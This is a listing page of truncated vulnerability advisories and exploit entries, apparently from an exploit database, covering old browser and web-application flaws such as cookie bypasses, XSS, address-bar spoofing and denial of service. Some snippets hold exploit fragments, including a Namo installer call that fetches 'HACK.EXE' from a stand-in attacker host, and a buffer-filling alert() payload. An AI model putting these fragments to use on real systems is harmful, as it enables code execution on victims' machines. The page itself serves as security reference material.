Host Directory PRO - Cookie Security Bypass

Host Directory PRO - Cookie Security Bypass source: https://www.securityfocus.com/bid/28863/info Host Directory PRO is prone to a security-bypass vulnerability because it fails to properly validate user credentials before performing certain actions. Exploiting this issue may allow an attacker to...

CcMail 1.0.1 - Insecure Cookie Handling

--==+================================================================================+==-- --==+ CcMail = 1.0.1 Insecure Cookie Handling +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: 11 April 2008 Script...

WebCT 4.x Javascript Session Stealer

WebCT 4.x Javascript Session Stealer Exploits Software: WebCT Campus Edition 4.x http://secunia.com/product/3280/ Affected Version: 4.1.5.8 Discoverer: Benjamin "balupton" Lupton Date Discovered: November 2005 Date Reported: 25/06/2007 Software Author Contacted again on: 20/07/2007 Date Published...

Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method

Namo Web Editor NamoInstaller.dll install Method Exploit function Check obj.Install"http://ATTACKER.COM/HACK.EXE" Unable to create object tml -- milw0rm.com 2008-01-25...

SquirrelMail GPGP Encryption Plugin 2.02.1 - Access Validation Input Validation

SquirrelMail GPGP Encryption Plugin 2.02.1 - Access Validation Input Validation source: https://www.securityfocus.com/bid/26788/info The G/PGP encryption plugin for SquirrelMail is prone to an input-validation vulnerability and an access-validation vulnerability. Attackers can exploit these issue...

Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : firefox vulnerabilities (USN-535-1)

Various flaws were discovered in the layout and JavaScript engines. By tricking a user into opening a malicious web page, an attacker could execute arbitrary code with the user's privileges. CVE-2007-5336, CVE-2007-5339, CVE-2007-5340 Michal Zalewski discovered that the onUnload event handlers we...

Opera 9.10 - alert() Remote Denial of Service

Opera 9.10 - alert Remote Denial of Service \n" File.write"\n" Bof = 'A'44444 File.write"alert'"+Bof+"'\n" File.write"\n" File.write"" File.close --...

CVE-2006-5709

Unspecified vulnerability in WorldClient in Alt-N Technologies MDaemon before 9.50 has unknown impact and attack vectors related to a "JavaScript exploit."...

CVE-2006-5709

Unspecified vulnerability in WorldClient in Alt-N Technologies MDaemon before 9.50 has unknown impact and attack vectors related to a "JavaScript exploit."...

CVE-2006-5709

Technical details about CVE-2006-5709 are not publicly provided in the supplied documents. Monitor for updates; no affected products, exploit info, or remediation details are confirmed here.

MS Internet Explorer 7 Popup Address Bar Spoofing-vulnerability warning-the black bar safety net

IE 7 Exploits .. ! Program code program code !-- Secunia Advisory: SA22542 Release Date: 2006-10-25 Impact: Spoofing Solution Status: Unpatched Software: Microsoft Internet Explorer 7. x Description: A weakness has been discovered in Internet Explorer, which can be exploited by malicious people t...

CVE-2006-2787

EvalInSandbox in Mozilla Firefox and Thunderbird before 1.5.0.4 allows remote attackers to gain privileges via javascript that calls the valueOf method on objects that were created outside of the sandbox...

captivateXSS.txt

Captivate 1.0 Homepage: http://new-place.org/scripts/ Description: A basic but highly-customizable PHP gallery script with optional thumbnail creation. Designed with screencaps in mind, it works best for large galleries of same-sized images. Effected files: gallery.php Inproper filtering of actio...

CVE-2006-1737

Integer overflow in Mozilla Firefox and Thunderbird 1.x before 1.5 and 1.0.x before 1.0.8, Mozilla Suite before 1.7.13, and SeaMonkey before 1.0 allows remote attackers to cause a denial of service crash and possibly execute arbitrary bytecode via JavaScript with a large regular expression...

Mozilla Firefox 1.0.7 (Mozilla 1.7.12) - Denial of Service

document.write''; milw0rm.com 2005-10-17...

Local file detection bug found through Adobe SVG Viewer

Hyperdose Security Advisory Name: Local file detection bug found through Adobe SVG Viewer Systems Affected: v3.0 unclear if earlier versions were affected Severity: Low Author: Robert Fly - [email protected] Advisory URL: http://www.hyperdose.com/advisories/H2005-07.txt --Adobe Description--...

Netscape Navigator 7.2 - Infinite Array Sort Denial of Service

Netscape Navigator 7.2 - Infinite Array Sort Denial of Service source: https://www.securityfocus.com/bid/12331/info Netscape Navigator is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is...

CVE-2004-2219

Microsoft Internet Explorer 6 allows remote attackers to spoof the address bar to facilitate phishing attacks via Javascript that uses an invalid URI, modifies the Location field, then uses history.back to navigate to the previous domain, aka NullyFake...

Microsoft Internet Explorer - Remote Code Execution

Microsoft Internet Explorer - Remote Code Execution CMDExe - Windows Exploit - Remote code execution with parameters - Proof of ConceptMore info about this exploit can be found at hhttp://freehost19.websamba.com/shreddersub7/expl-discuss.htm. © 2004 ShredderSub7 function DisplayLocStrings...

CVE-2004-1173

Internet Explorer 6 allows remote attackers to bypass the popup blocker via the document object model DOM methods in the DHTML Dynamic HTML DHTML Editing Component DEC and Javascript that calls showModalDialog...